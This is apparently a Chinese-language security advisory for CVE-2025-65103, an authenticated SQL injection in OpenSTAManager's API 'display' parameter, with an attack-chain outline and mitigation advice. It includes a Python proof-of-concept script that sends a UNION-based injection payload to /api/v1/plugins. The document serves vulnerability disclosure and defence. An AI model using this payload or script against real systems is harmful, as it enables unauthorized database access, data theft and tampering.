CVE-2025-65103 OpenSTAManager API SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-65103

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenSTAManager

漏洞概述

OpenSTAManager是一款开源的技术支持和发票管理软件。在2.9.5之前的版本中，存在一处严重的认证后SQL注入漏洞，存在于API接口中。该漏洞允许任何已认证用户（无论其权限级别如何）执行任意SQL查询语句。攻击者可以通过操纵API请求中的display参数，绕过正常的安全检查机制，直接与数据库进行交互。通过构造恶意的SQL语句，攻击者可以窃取数据库中的敏感信息（如用户凭证、财务数据、客户信息等），修改关键业务数据，甚至删除整个数据库内容，最终导致系统完全沦陷。此漏洞影响所有使用受影响版本的企业和组织，可能造成严重的数据泄露和业务中断风险。该问题已在2.9.5版本中得到修复。

技术细节

该SQL注入漏洞存在于OpenSTAManager的API接口中，具体位于处理display参数的逻辑中。在应用程序处理用户输入时，未对display参数进行充分的输入验证和SQL语句参数化处理。当用户提交API请求时，display参数的值被直接拼接到SQL查询语句中，而没有经过适当的安全过滤或使用参数化查询。攻击者可以利用这一漏洞，通过在display参数中注入恶意的SQL代码片段（如UNION SELECT、ERROR-BASED INJECTION等技巧）来执行任意SQL命令。由于该漏洞存在于API层面，且影响所有认证用户（包括低权限用户），攻击者可以轻松获取数据库访问权限，进而进行数据泄露、数据篡改或完全控制数据库系统。漏洞的利用不需要任何特殊的用户交互，攻击者只需构造特定的HTTP请求即可成功实施攻击。

攻击链分析

STEP 1

步骤1

攻击者获取OpenSTAManager的有效用户凭据或会话令牌，可以通过社会工程、弱密码攻击或其他方式获取

STEP 2

步骤2

攻击者构造包含恶意SQL代码的API请求，特别是在display参数中注入SQL注入payload

STEP 3

步骤3

攻击者向目标API端点（如/api/v1/plugins）发送恶意构造的HTTP请求

STEP 4

步骤4

服务器将display参数值直接拼接到SQL查询中未进行安全过滤，执行注入的恶意SQL代码

STEP 5

步骤5

攻击者利用UNION、ERROR-BASED或BLIND等SQL注入技术提取数据库中的敏感信息或执行任意数据库操作

STEP 6

步骤6

攻击者获取管理员权限、窃取敏感数据、篡改业务记录或删除整个数据库，导致系统完全沦陷

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-65103 OpenSTAManager SQL Injection PoC
# Target: OpenSTAManager < 2.9.5
# Vulnerability: Authenticated SQL Injection via display parameter in API

def exploit_sql_injection(target_url, session_token):
    """
    Exploit SQL injection in OpenSTAManager API
    """
    headers = {
        'Authorization': f'Bearer {session_token}',
        'Content-Type': 'application/json'
    }
    
    # SQL Injection payload to extract database version
    # Using UNION-based injection technique
    payload = {
        'display': "1' UNION SELECT NULL,version(),user(),database()-- -",
        'module': 'anagraphs'
    }
    
    target = f"{target_url.rstrip('/')}/api/v1/plugins"
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Payload: {payload}")
    
    try:
        response = requests.post(target, json=payload, headers=headers, timeout=30)
        
        if response.status_code == 200:
            print("[+] Request successful - check response for SQL injection results")
            print(f"[+] Response: {response.text[:500]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <session_token>")
        print(f"Example: python {sys.argv[0]} https://target.com/token ABC123")
        sys.exit(1)
    
    target_url = sys.argv[1]
    session_token = sys.argv[2]
    
    exploit_sql_injection(target_url, session_token)

影响范围

OpenSTAManager < 2.9.5

防御指南

临时缓解措施

立即将OpenSTAManager升级到2.9.5版本以修复该SQL注入漏洞。在无法立即升级的情况下，可以采取以下临时缓解措施：1）限制API访问权限，仅允许受信任的IP地址访问API端点；2）实施Web应用防火墙规则阻断包含SQL注入特征的请求；3）监控数据库访问日志，及时发现异常的SQL执行行为；4）对现有用户密码进行强制重置，防止因数据泄露导致的账户被盗用；5）启用双因素认证增强账户安全性。